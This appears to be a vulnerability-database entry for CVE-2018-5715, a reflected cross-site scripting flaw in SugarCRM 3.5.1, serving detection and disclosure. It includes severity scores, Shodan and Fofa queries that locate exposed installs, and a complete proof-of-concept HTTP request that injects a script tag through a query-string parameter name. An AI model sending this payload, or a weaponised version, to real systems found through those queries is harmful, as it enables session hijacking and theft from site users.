| Title | SugarCRM 3.5.1 - Cross-Site Scripting |
|---|---|
| Author | edoardottt |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to a patched version of SugarCRM or apply the necessary security patches provided by the vendor. |
| CVSS Score | 6.1 |
| EPSS Score | 0.06802 |
| CVE ID | CVE-2018-5715 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:"SugarCRM Inc. All Rights Reserved"http.title:sugarcrmhttp.html:"sugarcrm inc. all rights reserved" |
| Fofa Query | body="sugarcrm inc. all rights reserved"title=sugarcrm |
| Tags | cve2018 cve sugarcrm xss edb vuln |
SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable).
GET /index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-5715.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-5715.pcap
N/AN/A